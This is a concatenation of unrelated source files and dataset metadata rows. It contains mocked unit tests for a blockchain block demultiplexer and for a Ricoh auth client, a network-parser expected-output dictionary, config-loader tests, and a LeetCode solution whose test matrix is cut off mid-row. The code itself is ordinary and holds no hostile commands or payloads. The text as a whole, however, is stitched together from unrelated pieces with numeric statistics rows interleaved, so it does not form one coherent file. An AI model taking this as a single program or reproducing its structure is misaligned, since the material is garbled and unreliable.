{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, UnknownBlockError(), block_9999]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_get_block.call_count == 3
assert mock_get_block.call_args_list == [call(9999), call(10000), call(9901)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_decrease_in_head_block_causes_rollback(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9901, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9901, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9901, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, block_9999]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
mock_rollback = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block,
rollback_fn=mock_rollback)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_rollback.call_count == 1
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(9999), call(9901)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_mismatched_previous_ids_is_a_rollback(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9900}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, fake_block_10000]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
mock_rollback = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block,
rollback_fn=mock_rollback)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(StopIteration) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_rollback.call_count == 1
assert mock_get_block.call_count == 2
assert mock_get_block.call_args_list == [call(9999), call(10000)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
@patch.object(Demux, '_get_block')
@patch.object(Demux, '_get_info')
@patch('demuxeos.time.sleep')
def test_mismatched_irreverible_blocks_asserts(self, mock_sleep,
mock_get_info_head_block,
mock_get_block):
"""
Test that continuous polling the block chain for new blocks works correctly
"""
# Internal implementation of get_info() which keeps head_block as var,
mock_get_info_head_block.side_effect = [{'head_block_num': 9999, 'last_irreversible_block_num' : 9999},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9999},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9999},
{'head_block_num': 9999, 'last_irreversible_block_num' : 9999},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9999},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9999},
{'head_block_num': 10000, 'last_irreversible_block_num' : 9999}]
# get block iterates through blocks each time it is called
mock_get_block.side_effect = [block_9999, fake_block_10000, block_1]
mock_start_block = Mock()
mock_action = Mock()
mock_commit_block = Mock()
mock_rollback = Mock()
# register the mock callback functions
d = Demux(start_block_fn=mock_start_block,
commit_block_fn=mock_commit_block,
rollback_fn=mock_rollback)
d.register_action(mock_action)
# process the mock blocks 9999
with pytest.raises(AssertionError) as excinfo:
d.process_blocks(9999)
# assertions
assert mock_rollback.call_count == 1
assert mock_get_block.call_count == 3
assert mock_get_block.call_args_list == [call(9999), call(10000), call(9999)]
assert mock_start_block.call_count == 2
assert mock_action.call_count == 28
assert mock_commit_block.call_count == 2
assert mock_sleep.call_count == 1
| 47.992537
| 146
| 0.611517
| 2,270
| 19,293
| 4.811013
| 0.074449
| 0.062265
| 0.048347
| 0.090102
| 0.901108
| 0.893508
| 0.892226
| 0.889387
| 0.889387
| 0.884351
| 0
| 0.051472
| 0.313222
| 19,293
| 401
| 147
| 48.112219
| 0.772755
| 0.150417
| 0
| 0.821561
| 0
| 0
| 0.132492
| 0.068826
| 0
| 0
| 0
| 0
| 0.252788
| 1
| 0.040892
| false
| 0
| 0.026022
| 0
| 0.070632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87d4e2c45a7ccfa2de27bbc6547430cb08f7ab98
| 5,643
|
py
|
Python
|
tests/test_auth/test_client.py
|
ricohapi/ricoh-cloud-sdk-python
|
740d778c678e6097e3c35478545cbf283276a7ee
|
[
"MIT"
] | 2
|
2018-08-14T21:01:07.000Z
|
2019-12-16T07:21:09.000Z
|
tests/test_auth/test_client.py
|
ricohapi/ricoh-cloud-sdk-python
|
740d778c678e6097e3c35478545cbf283276a7ee
|
[
"MIT"
] | null | null | null |
tests/test_auth/test_client.py
|
ricohapi/ricoh-cloud-sdk-python
|
740d778c678e6097e3c35478545cbf283276a7ee
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ricoh Co., Ltd. All Rights Reserved.
import json
from unittest import TestCase
import mock
import pytest
from requests.exceptions import RequestException
from ricohcloudsdk.auth.client import AuthClient
ENDPOINT = 'https://auth.api.ricoh/v1/token'
SCOPE = 'ips.api.ricoh/v1/detect_faces ips.api.ricoh/v1/compare_faces ips.api.ricoh/v1/detect_humans'
class TestInit(TestCase):
def test_ok(self):
AuthClient('client_id_test', 'client_secret_test')
def test_param_err1(self):
with pytest.raises(TypeError):
AuthClient()
def test_param_err2(self):
with pytest.raises(TypeError):
AuthClient('a')
class TestSession(TestCase):
def setUp(self):
self.target = AuthClient('client_id_test', 'client_secret_test')
self.__expected = {
'access_token': 'atoken',
'api_key': 'api_key',
'expires_in': 3600,
'scope': SCOPE,
'token_type': 'Bearer'
}
def __create_payload(self):
payload = {
'grant_type': 'client_credentials',
'scope': SCOPE
}
return payload
@mock.patch('requests.post')
def test_ok(self, req):
req.return_value.text = json.dumps(self.__expected)
ret = self.target.session(AuthClient.SCOPES['vrs'])
assert ret == self.__expected
payload = self.__create_payload()
req.assert_called_once_with(
ENDPOINT, auth=self.target._AuthClient__bauth, data=payload)
@mock.patch('requests.post')
def test_json_exception(self, req):
req.return_value.text = 'not json'
with pytest.raises(ValueError):
self.target.session(AuthClient.SCOPES['vrs'])
payload = self.__create_payload()
req.assert_called_once_with(
ENDPOINT, auth=self.target._AuthClient__bauth, data=payload)
@mock.patch('requests.post')
def test_missing_expire_in(self, req):
req.return_value.text = json.dumps(
{
'access_token': 'atoken',
'api_key': 'api_key'
}
)
with pytest.raises(ValueError):
self.target.session(AuthClient.SCOPES['vrs'])
payload = self.__create_payload()
req.assert_called_once_with(
ENDPOINT, auth=self.target._AuthClient__bauth, data=payload)
@mock.patch('requests.post')
def test_missing_keys(self, req):
req.return_value.text = json.dumps(
{
'test': 'atoken'
}
)
with pytest.raises(ValueError):
self.target.session(AuthClient.SCOPES['vrs'])
payload = self.__create_payload()
req.assert_called_once_with(
ENDPOINT, auth=self.target._AuthClient__bauth, data=payload)
@mock.patch('requests.post')
def test_requests_exception(self, req):
req.side_effect = RequestException
with pytest.raises(RequestException):
self.target.session(AuthClient.SCOPES['vrs'])
payload = self.__create_payload()
req.assert_called_once_with(
ENDPOINT, auth=self.target._AuthClient__bauth, data=payload)
class TestGetAccessToken(TestCase):
def setUp(self):
self.target = AuthClient('cid', 'cpass')
self.__expected = {
'access_token': 'atoken',
'api_key': 'api_key',
'expires_in': 3600,
'scope': SCOPE,
'token_type': 'Bearer'
}
@mock.patch('requests.post')
def test_ok(self, req):
req.return_value.text = json.dumps(self.__expected)
self.target.session(AuthClient.SCOPES['vrs'])
req.return_value.text = None
ret = self.target.get_access_token()
assert ret == 'atoken'
@mock.patch('requests.post')
def test_r_ok(self, req):
req.return_value.text = json.dumps(self.__expected)
ret = self.target.get_access_token()
assert ret == 'atoken'
@mock.patch('requests.post')
def test_json_exception(self, req):
req.return_value.text = 'not json'
with pytest.raises(ValueError):
ret = self.target.get_access_token()
@mock.patch('requests.post')
def test_exception(self, req):
req.side_effect = RequestException
with pytest.raises(RequestException):
ret = self.target.get_access_token()
class TestGetAPIKey(TestCase):
def setUp(self):
self.target = AuthClient('cid', 'cpass')
self.__expected = {
'access_token': 'atoken',
'api_key': 'api_key',
'expires_in': 3600,
'scope': SCOPE,
'token_type': 'Bearer'
}
@mock.patch('requests.post')
def test_ok(self, req):
req.return_value.text = json.dumps(self.__expected)
self.target.session(AuthClient.SCOPES['vrs'])
req.return_value.text = None
ret = self.target.get_api_key()
assert ret == 'api_key'
@mock.patch('requests.post')
def test_r_ok(self, req):
req.return_value.text = json.dumps(self.__expected)
ret = self.target.get_api_key()
assert ret == 'api_key'
@mock.patch('requests.post')
def test_json_exception(self, req):
req.return_value.text = 'not json'
with pytest.raises(ValueError):
self.target.get_access_token()
@mock.patch('requests.post')
def test_exception(self, req):
req.side_effect = RequestException
with pytest.raises(RequestException):
self.target.get_access_token()
| 31.52514
| 101
| 0.616516
| 646
| 5,643
| 5.142415
| 0.153251
| 0.069235
| 0.066526
| 0.082179
| 0.852498
| 0.829922
| 0.789585
| 0.746839
| 0.72637
| 0.72637
| 0
| 0.005532
| 0.263158
| 5,643
| 178
| 102
| 31.702247
| 0.79341
| 0.013645
| 0
| 0.719178
| 0
| 0.006849
| 0.12709
| 0.015999
| 0
| 0
| 0
| 0
| 0.068493
| 1
| 0.136986
| false
| 0.013699
| 0.041096
| 0
| 0.212329
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
87ee5a633670f6f81818c998480852d4f1b4b21d
| 262
|
py
|
Python
|
mg_approval/wizard/__init__.py
|
divyapy/odoo
|
a4b796fc8a9d291ff1b4c93e53e27f566947adf2
|
[
"MIT"
] | null | null | null |
mg_approval/wizard/__init__.py
|
divyapy/odoo
|
a4b796fc8a9d291ff1b4c93e53e27f566947adf2
|
[
"MIT"
] | null | null | null |
mg_approval/wizard/__init__.py
|
divyapy/odoo
|
a4b796fc8a9d291ff1b4c93e53e27f566947adf2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import purchase_action_dashboard_wizard
from . import po_details_wizard
from . import create_tender
from . import pr_approve_wizard
from . import pr_reject_wizard
from . import pr_withdraw_wizard
from . import create_single_source
| 29.111111
| 46
| 0.812977
| 38
| 262
| 5.236842
| 0.5
| 0.351759
| 0.40201
| 0.221106
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004367
| 0.125954
| 262
| 9
| 47
| 29.111111
| 0.864629
| 0.080153
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
87f8597d74baf6e77145c7645d8fbfec20709996
| 17,530
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_13_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_13_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_13_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
"tag": {
"1": {
"topo_type": "unicast",
"topo_name": "base",
"tid": 0,
"topo_id": "0x0",
"flex_algo": {
128: {
"prefix": {
"2.2.2.2": {
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"subnet": "32",
"source_router_id": "2.2.2.2",
"algo": {
0: {
"sid_index": 23,
"bound": True
},
1: {}
},
"via_interface": {
"Ethernet0/1": {
"level": {
"L1": {
"source_ip": {
"2.2.2.2": {
"lsp": {
"next_hop_lsp_index": 3,
"rtp_lsp_index": 3,
"rtp_lsp_version": 9,
"tpl_lsp_version": 9
},
"distance": 115,
"metric": 10,
"via_ip": "12.1.1.2",
"tag": "0",
"host": "R2.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 23,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "implicit-null"
},
1: {}
}
}
}
},
"L2": {
"source_ip": {
"2.2.2.2": {
"lsp": {
"next_hop_lsp_index": 4,
"rtp_lsp_index": 4,
"rtp_lsp_version": 15,
"tpl_lsp_version": 15
},
"distance": 115,
"metric": 10,
"via_ip": "12.1.1.2",
"tag": "0",
"host": "R2.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 23,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
},
"Ethernet0/2": {
"level": {
"L2": {
"source_ip": {
"3.3.3.3": {
"lsp": {
"next_hop_lsp_index": 6,
"rtp_lsp_index": 6,
"rtp_lsp_version": 17,
"tpl_lsp_version": 17
},
"distance": 115,
"metric": 30,
"via_ip": "13.1.1.2",
"tag": "0",
"host": "R3.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": True
},
"algo": {
0: {
"sid_index": 23,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
}
}
},
"3.3.3.3": {
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"subnet": "32",
"algo": {
0: {
"sid_index": 33,
"bound": True
},
1: {}
},
"via_interface": {
"Ethernet0/2": {
"level": {
"L1": {
"source_ip": {
"3.3.3.3": {
"lsp": {
"next_hop_lsp_index": 5,
"rtp_lsp_index": 5,
"rtp_lsp_version": 9,
"tpl_lsp_version": 9
},
"distance": 115,
"metric": 10,
"via_ip": "13.1.1.2",
"tag": "0",
"host": "R3.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 33,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "implicit-null"
},
1: {}
}
}
}
},
"L2": {
"source_ip": {
"3.3.3.3": {
"lsp": {
"next_hop_lsp_index": 6,
"rtp_lsp_index": 6,
"rtp_lsp_version": 17,
"tpl_lsp_version": 17
},
"distance": 115,
"metric": 10,
"via_ip": "13.1.1.2",
"tag": "0",
"host": "R3.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"algo": {
0: {
"sid_index": 33,
"flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
},
"Ethernet0/1": {
"level": {
"L2": {
"source_ip": {
"2.2.2.2": {
"lsp": {
"next_hop_lsp_index": 4,
"rtp_lsp_index": 4,
"rtp_lsp_version": 15,
"tpl_lsp_version": 15
},
"distance": 115,
"metric": 30,
"via_ip": "12.1.1.2",
"tag": "0",
"host": "R2.00-00",
"filtered_out": False,
"prefix_attr": {
"x_flag": False,
"r_flag": True,
"n_flag": True
},
"algo": {
0: {
"sid_index": 33,
"flags": {
"r_flag": True,
"n_flag": True,
"p_flag": True,
"e_flag": False,
"v_flag": False,
"l_flag": False
}
},
1: {}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
| 60.24055
| 84
| 0.115801
| 578
| 17,530
| 3.240484
| 0.129758
| 0.201815
| 0.067272
| 0.064602
| 0.928991
| 0.896423
| 0.854245
| 0.854245
| 0.854245
| 0.854245
| 0
| 0.07194
| 0.824758
| 17,530
| 291
| 85
| 60.24055
| 0.53776
| 0
| 0
| 0.697595
| 0
| 0
| 0.094689
| 0
| 0
| 0
| 0.000171
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e21123484b6f7f78e6edc5a38b68ea895d9056bc
| 2,361
|
py
|
Python
|
tests/test_utils.py
|
rohankumardubey/configurationfileValidator
|
0acd1eccda6cd71c69d2ae33166a16a257685811
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
rohankumardubey/configurationfileValidator
|
0acd1eccda6cd71c69d2ae33166a16a257685811
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
rohankumardubey/configurationfileValidator
|
0acd1eccda6cd71c69d2ae33166a16a257685811
|
[
"MIT"
] | null | null | null |
import unittest
import yaml
from confirm import utils
class LoadConfigFileTestCase(unittest.TestCase):
def test_yaml(self):
config_file = """
section:
option=value
"""
config_file_path = 'schema.yaml'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
def test_invalid_yaml(self):
config_file = """
[[[section]]]
option=value
"""
config_file_path = 'schema.yaml'
self.assertRaises(yaml.YAMLError, utils.load_config_file, config_file_path, config_file)
def test_infer_yaml(self):
config_file = """
section:
option=value
"""
config_file_path = 'schema.notyaml'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
def test_extension_case_insensitive(self):
config_file = """
section:
option=value
"""
config_file_path = 'schema.yaml'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
config_file_path = 'schema.YAML'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
config_file = """[section]\noption=value"""
config_file_path = 'schema.CONF'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
config_file_path = 'schema.conf'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
def test_ini_interpolation_compatible(self):
config_file = """[section]\noption=%(value)s %()s %s"""
config_file_path = 'schema.ini'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
def test_yaml_interpolation_compatible(self):
config_file = """
section:
option=%(value)s %()s %s
"""
config_file_path = 'schema.yaml'
loaded_config = utils.load_config_file(config_file_path, config_file)
self.assertIn('section', loaded_config)
| 28.445783
| 96
| 0.651419
| 271
| 2,361
| 5.306273
| 0.132841
| 0.299026
| 0.175243
| 0.125174
| 0.871349
| 0.853268
| 0.7879
| 0.7879
| 0.762865
| 0.732962
| 0
| 0
| 0.246929
| 2,361
| 82
| 97
| 28.792683
| 0.808774
| 0
| 0
| 0.655172
| 0
| 0
| 0.202033
| 0.021177
| 0
| 0
| 0
| 0
| 0.155172
| 1
| 0.103448
| false
| 0
| 0.051724
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35c351756ef60314e29398f1648129964e5909a9
| 72
|
py
|
Python
|
python/src/test/resources/pyfunc/numpy_random1_test.py
|
maropu/lljvm-translator
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 70
|
2017-12-12T10:54:00.000Z
|
2022-03-22T07:45:19.000Z
|
python/src/test/resources/pyfunc/numpy_random1_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 14
|
2018-02-28T01:29:46.000Z
|
2019-12-10T01:42:22.000Z
|
python/src/test/resources/pyfunc/numpy_random1_test.py
|
maropu/lljvm-as
|
322fbe24a27976948c8e8081a9552152dda58b4b
|
[
"Apache-2.0"
] | 4
|
2019-07-21T07:58:25.000Z
|
2021-02-01T09:46:59.000Z
|
import numpy as np
def numpy_random1_test():
return np.random.ranf()
| 14.4
| 25
| 0.75
| 12
| 72
| 4.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016393
| 0.152778
| 72
| 4
| 26
| 18
| 0.836066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ea785a5fced985133b6770b9bfffb1026f82ccc2
| 97,734
|
py
|
Python
|
No_1277_Count Square Submatrices with All Ones/count_square_submatrices_with_all_ones_by_integral_image.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 32
|
2020-01-05T13:37:16.000Z
|
2022-03-26T07:27:09.000Z
|
No_1277_Count Square Submatrices with All Ones/count_square_submatrices_with_all_ones_by_integral_image.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | null | null | null |
No_1277_Count Square Submatrices with All Ones/count_square_submatrices_with_all_ones_by_integral_image.py
|
coderMaruf/leetcode-1
|
20ffe26e43999e44c8acf9800acb371a49bb5853
|
[
"MIT"
] | 8
|
2020-06-18T16:17:27.000Z
|
2022-03-15T23:58:18.000Z
|
from typing import List
class Solution:
def countSquares(self, matrix: List[List[int]]) -> int:
square_counter = 0
h, w = len(matrix), len(matrix[0])
size = min(h, w)
integral_image = [ [0 for _ in range(w)] for _ in range(h) ]
for y in range(h):
summation = 0
for x in range(w):
summation += matrix[y][x]
integral_image[y][x] = summation
if y > 0:
integral_image[y][x] += integral_image[y-1][x]
for y in range(h):
for x in range(w):
for side in range(1,size+1):
if y + side > h or x + side > w:
break
all_ones = side * side
if side == 1:
area = matrix[y][x]
else:
bottom_right = integral_image[y+side-1][x+side-1]
bottom_left = integral_image[y+side-1][x-1] if x >= 1 else 0
top_right = integral_image[y-1][x+side-1] if y >= 1 else 0
top_left = integral_image[y-1][x-1] if x >= 1 and y >= 1 else 0
area = bottom_right - bottom_left - top_right + top_left
if area == all_ones:
square_counter += 1
else:
# Early break, beacuse current side is not satisfied.
# Therefore larger side cannot be satisfited, either.
break
return square_counter
# m : the dimension of column of matrix
# n : the dimension of row of matrix
# k : min(m,n)
## Time Complexity: O( m * n * k)
#
# The overhead in time is the nested loop, which is of O( m * n * k )
## Space Complexity: O( m * n )
#
# The overhead in space is the storage for integral image, which is of O( m * n )
from collections import namedtuple
TestEntry = namedtuple('TestEntry', 'matrix')
def test_bench():
test_data = [
TestEntry( matrix = [
[0,1,1,1],
[1,1,1,1],
[0,1,1,1]
]),
TestEntry( matrix = [
[1,0,1],
[1,1,0],
[1,1,0]
]
),
TestEntry( matrix = [[0,0,0,1,1,0,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,1,0,1,1,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,0,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,1,1,1,1,1,1,1,0,1,0,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,0,0,1,1,0,1,1,1,0,0,1,0,1,1,1,0,1,0,0,0,0,1,1,0,0,0,1],[1,1,1,0,1,1,0,1,0,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,1,1,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,0,1,0,0,0,1,1,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,1,0,0,1,0,1,1,1,1,0,1,0,1,1,0,1,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,1,0,0,1,0,1,0,0,1,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,0,0,1,1,0,0],[1,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,0,0,0,1,1,0,1,0,1,1,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,1,0,0,1,0,1,1,0,0,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,0,1,1,1,1,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,0,0,1,1,0,0,1,1,1,1,0,1,0,0,0,1,0,1,0,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,1,1],[0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,0,1,0,1,1,1,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,1,1,0,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,0,1,0,0,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,1,0,0,1,0,1,0,1,0,0,1,0,0,1,0,1,0,1],[0,1,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,0,1,0,0,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,0,1,1,